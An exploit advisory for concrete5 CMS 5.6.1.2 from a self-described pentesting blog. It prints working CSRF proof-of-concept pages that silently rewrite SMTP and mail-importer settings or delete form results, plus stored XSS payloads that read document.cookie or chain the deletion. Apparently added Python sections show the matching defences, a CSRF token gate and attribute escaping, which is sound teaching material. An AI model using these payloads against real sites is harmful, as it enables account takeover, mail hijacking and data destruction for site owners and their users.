=============================================================
eXpl0i13r
blackpentesters.blogspot.com
=============================================================
###########################################################################################
# Exploit Title: [ concrete5 CMS v5.6.1.2 Multiple CSRF and Stored XSS Vulnerabilities] #
# Date: [2013-6-9] #
# Exploit Author: [expl0i13r] #
# Vendor Homepage: [http://www.concrete5.org/] #
# Software Link: [http://www.concrete5.org/download_file/-/view/51635/8497/] #
# Version: [5.6.1.2] #
# Google Dork: [Built with concrete5 - an open source CMS] #
# Tested on: [Windows] #
# Contact: expl0i13r@gmail.com #
###########################################################################################
Summary:
========
1. CSRF (Modify SMTP Settings)
2. CSRF (Modify Mail Importers Settings)
3. CSRF (Delete Form Results)
4. Stored XSS
1. CSRF (Modify SMTP Settings):
================================
concrete5 v5.6.1.2 suffers from multiple CSRF vulnerabilities, one of which allows an attacker
to modify the "SMTP Settings" and "Send Mail Method" available at the URL below:
Affected URL:
--------------
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/method/
----------------------------------------------------------------------------------------
Note: The code below fills in the form details and submits them, updating the settings, when the victim loads this page.
----------------------------------------------------------------------------------------
<html>
<head>
<script type="text/javascript" language="javascript">
function submitform()
{
document.getElementById('myForm').submit();
}
</script>
</head>
<body>
<form name="myForm" method="post" action="http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/method/save_settings/" class="form-horizontal" id="mail-settings-form" original-class="form-horizontal">
<input type="radio" name="MAIL_SEND_METHOD" id="MAIL_SEND_METHOD2" value="SMTP" class="ccm-input-radio" checked>
<input id="MAIL_SEND_METHOD_SMTP_SERVER" type="text" name="MAIL_SEND_METHOD_SMTP_SERVER" value="127.0.0.1" class="ccm-input-text">
<input id="MAIL_SEND_METHOD_SMTP_USERNAME" type="text" name="MAIL_SEND_METHOD_SMTP_USERNAME" value="expl0i13r" class="ccm-input-text">
<input id="MAIL_SEND_METHOD_SMTP_PASSWORD" type="text" name="MAIL_SEND_METHOD_SMTP_PASSWORD" value="expl0i13r" class="ccm-input-text">
<select name="MAIL_SEND_METHOD_SMTP_ENCRYPTION" id="MAIL_SEND_METHOD_SMTP_ENCRYPTION" ccm-passed-value="SSL" class="ccm-input-select">
<option value="">None</option>
<option value="SSL" selected="selected">SSL</option>
<option value="TLS">TLS</option></select>
<input id="MAIL_SEND_METHOD_SMTP_PORT" type="text" name="MAIL_SEND_METHOD_SMTP_PORT" value="" class="ccm-input-text">
</form>
<script type="text/javascript" language="javascript">
document.myForm.submit()
</script>
</body>
</html>
2. CSRF (Modify Mail Importer Settings)
=========================================
The code below exploits a CSRF vulnerability that allows an attacker to edit and update the "Importer Settings" details.
Affected URL :
---------------
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/importers/edit_importer/1/
----------------------------------------------------------------------------------------
Note: The code below fills in the form details and submits them, updating the settings, when the victim loads this page.
----------------------------------------------------------------------------------------
<html>
<head>
<script type="text/javascript" language="javascript">
function submitform()
{
document.getElementById('myForm').submit();
}
</script>
</head>
<body>
<form name = "myForm" method="post" id="mail-importer-form" class="form-horizontal" action="http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/importers/save_importer/" original-class="form-horizontal">
<input type="hidden" name="miID" id="miID" value="1">
<input id="miEmail" type="text" name="miEmail" value="exploiter">
<input id="miServer" type="text" name="miServer" value="127.0.0.1" class="ccm-input-text">
<input id="miUsername" type="text" name="miUsername" value="" class="ccm-input-text">
<input id="miPassword" type="text" name="miPassword" value="" class="ccm-input-text"> <input id="miPort" type="text" name="miPort" value="8080" class="ccm-input-text">
<select name="miEncryption" id="miEncryption" ccm-passed-value="" class="ccm-input-select">
<option value="" selected="selected">None</option>
</select>
<select name="miIsEnabled" id="miIsEnabled" ccm-passed-value="1" class="ccm-input-select">
<option value="1" selected="selected">Yes</option>
</select>
<select name="miConnectionMethod" id="miConnectionMethod" ccm-passed-value="POP" class="ccm-input-select">
<option value="POP" selected="selected">POP</option>
</select>
</form>
<script type="text/javascript" language="javascript">
document.myForm.submit()
</script>
</body>
</html>
3. CSRF (Delete Form Results)
===============================
Each submission listed on the "REPORTS" > "Form Results" page has a static "qsID" assigned to it, which an attacker can use to delete the submissions.
Ex.
---
When this CMS is installed, a "Contact Us" form is available by default at the URL: http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/blog/hello-world/about/contact-us/
For the above contact form, the qsID in my case is "1370626098", which can be found at the URL:
--------------------------------------------------------------------------------------
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/
--------------------------------------------------------------------------------------
<a href="/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers" class="btn small error delete-form-answers ccm-button-v2-left">Delete Submissions</a>
------------------------------------------------------------------------------------------------------
In order to exploit this CSRF, the attacker must know the "qsID" value, for which the attacker needs at least limited access to the CMS.
Steps:
------
1. The attacker logs in to the CMS
2. Navigates to "http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/"
3. Gets the static "qsID" value from the page source
4. Uses the "qsID" to create the CSRF exploit below
Code:
-------
<html>
<head>
<script>
// "delete" is a reserved word in JavaScript, so the function needs another name
function deleteSubmissions()
{
// Delete the submissions of the "Contact Us" page
window.open("http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers")
}
</script>
</head>
<body onload="deleteSubmissions()">
</body>
</html>
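All three CSRF pages above work for the same two reasons: the dashboard actions accept a request carried only by the victim's session cookie, and the delete action even runs on a plain GET. The following is an added example, not concrete5 code, of the server-side gate that stops them: state changes only over POST, an Origin/Referer check when the browser sends one, and a per-session synchronizer token compared in constant time. The field name csrf_token, the SITE_ORIGIN value and the request/session objects are assumptions made for the illustration; the replayed requests reuse the parameter names and the qsID from the advisory.

```python
# Added example (not concrete5 code): the server-side gate that stops the three
# CSRF pages above. Field and header names are assumed for illustration.
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Origin the dashboard is served from (assumed; matches the URLs in the advisory).
SITE_ORIGIN = "http://127.0.0.1"


@dataclass
class Session:
    """Per-login session state. The token is random and bound to this session,
    so a page on another site has no way to read or guess it."""
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))


@dataclass
class Request:
    method: str
    headers: dict
    form: dict          # POST fields or query parameters
    session: Session    # the session the browser's cookie resolves to


def same_origin(url: str) -> bool:
    """Compare scheme and host[:port] of an Origin/Referer value to the site."""
    a, b = urlsplit(url), urlsplit(SITE_ORIGIN)
    return (a.scheme, a.netloc) == (b.scheme, b.netloc)


def check_state_change(req: Request) -> tuple:
    """Return (allowed, reason) for a request that changes state, such as
    save_settings, save_importer or action=deleteFormAnswers."""
    # 1. Only POST may change state: the window.open() / <a href> delete in
    #    section 3 is a GET and fails here regardless of anything else.
    if req.method != "POST":
        return False, "state change over %s; POST required" % req.method
    # 2. If the browser sent Origin or Referer, it must name this site. The
    #    auto-submitting forms in sections 1 and 2 are posted from the
    #    attacker's page, so the browser fills in that page's origin.
    source = req.headers.get("Origin") or req.headers.get("Referer")
    if source is not None and not same_origin(source):
        return False, "cross-site request from %s" % source
    # 3. Synchronizer token: the genuine dashboard form carries the session's
    #    token as a hidden field; a forged form cannot. Constant-time compare
    #    so the check does not leak the token byte by byte.
    sent = req.form.get("csrf_token", "")
    if not hmac.compare_digest(sent, req.session.csrf_token):
        return False, "missing or invalid CSRF token"
    return True, "ok"


def demo() -> dict:
    """Replay the advisory's forged requests and one genuine one.
    All values are constructed for the example."""
    victim = Session()
    cases = {
        # Sections 1/2: auto-submitted form from another site, no token.
        "forged_post": Request("POST", {"Origin": "http://attacker.example"},
                               {"MAIL_SEND_METHOD": "SMTP",
                                "MAIL_SEND_METHOD_SMTP_SERVER": "127.0.0.1"}, victim),
        # Same forgery from a browser that sends no Origin/Referer: the token check catches it.
        "forged_post_no_headers": Request("POST", {}, {"miID": "1", "miServer": "127.0.0.1"}, victim),
        # Section 3: the delete link is opened with a plain GET.
        "forged_get": Request("GET", {"Referer": "http://attacker.example/csrf.html"},
                              {"qsID": "1370626098", "action": "deleteFormAnswers"}, victim),
        # A token taken from some other session does not match the victim's.
        "wrong_session_token": Request("POST", {"Origin": SITE_ORIGIN},
                                       {"csrf_token": Session().csrf_token}, victim),
        # Genuine dashboard submission: same origin and the session's own token.
        "genuine": Request("POST", {"Origin": SITE_ORIGIN},
                           {"MAIL_SEND_METHOD": "SMTP", "csrf_token": victim.csrf_token}, victim),
    }
    return {name: check_state_change(r) for name, r in cases.items()}


if __name__ == "__main__":
    for name, (ok, why) in demo().items():
        print("%-24s %s (%s)" % (name, "ALLOW" if ok else "REJECT", why))
```

The token check is the one that matters; the POST-only and origin checks are defence in depth for the cases where a token is forgotten on one handler or a browser omits the headers. Note that the "Delete Submissions" link in section 3 would need to become a POST form for the first check to apply to it.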
4. Multiple Stored XSS
=======================
concrete5 CMS also suffers from stored XSS vulnerabilities, which can be used to "Delete Form Results"
every time the page is loaded.
Stored XSS-1
============
URL:
----
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/users/add_group/
Vulnerable Parameter:
----------------------
<input type="text" name="gName" class="span6" value="" id="acpro_inp2">
XSS-CSRF Payload:
------------------
"><script>window.open("http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers");alert('Form Result Data Deleted - eXpl0i13r')</script>
Stored XSS-2:
=============
URL:
-----
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/attributes/sets/
Vulnerable Parameter:
----------------------
<input id="asName" type="text" name="asName" value="" class="ccm-input-text">
Payload:
---------
"><script>alert('hacked by eXpl0i13r\n'+document.cookie)</script>
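Both stored XSS findings have the same shape: the saved gName / asName text is written back into a value="" attribute without escaping, so a value beginning with "> closes the attribute and the tag and starts a script element. The following added example (not concrete5 code) renders the input both ways and parses the result the way a browser would, showing that with attribute escaping the parser sees only the input element and still hands back the original text as the field's value. The payload is constructed in the same shape as the advisory's, and the render functions are assumptions for the illustration.

```python
# Added example (not concrete5 code): storing the group / attribute-set name
# verbatim is fine; the fix is to escape it when rendering it back into the
# value="" attribute (and anywhere else it appears in HTML).
import html
from html.parser import HTMLParser

# Constructed payload in the same shape as the advisory's: closes the
# attribute, closes the tag, and starts a <script> element.
PAYLOAD = '"><script>alert(document.cookie)</script>'


def render_unsafe(field_name: str, stored: str) -> str:
    """The vulnerable pattern: stored text pasted straight into the attribute."""
    return '<input type="text" name="%s" value="%s">' % (field_name, stored)


def render_escaped(field_name: str, stored: str) -> str:
    """The fix: html.escape(quote=True) turns " into &quot; and < > into
    &lt; &gt;, so the value can neither end the attribute nor open a tag."""
    return '<input type="text" name="%s" value="%s">' % (
        field_name, html.escape(stored, quote=True))


class _Elements(HTMLParser):
    """Collect element names and the input's value attribute, as a browser
    would parse the markup (entity references are decoded by the parser)."""
    def __init__(self):
        super().__init__()
        self.tags = []
        self.input_value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.input_value = dict(attrs).get("value")


def parse(markup: str) -> _Elements:
    p = _Elements()
    p.feed(markup)
    p.close()
    return p


def elements(markup: str) -> list:
    """Element names a parser sees: a second element means the value broke out."""
    return parse(markup).tags


def decoded_value(markup: str) -> str:
    """What the browser hands back as the input's value after entity decoding."""
    return parse(markup).input_value


if __name__ == "__main__":
    for name, render in (("unsafe", render_unsafe), ("escaped", render_escaped)):
        out = render("gName", PAYLOAD)
        print(name, elements(out), repr(decoded_value(out)))
```

Escaping at output time, rather than stripping characters at input time, keeps the stored data intact (the decoded value round-trips unchanged) and covers every place the name is later displayed, not just the one form.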
##################################
# eXpl0i13r #
# ------------------------------ #
#|blackpentesters.blogspot.com |#
#|infotech-knowledge.blogspot.in|#
# ------------------------------ #
##################################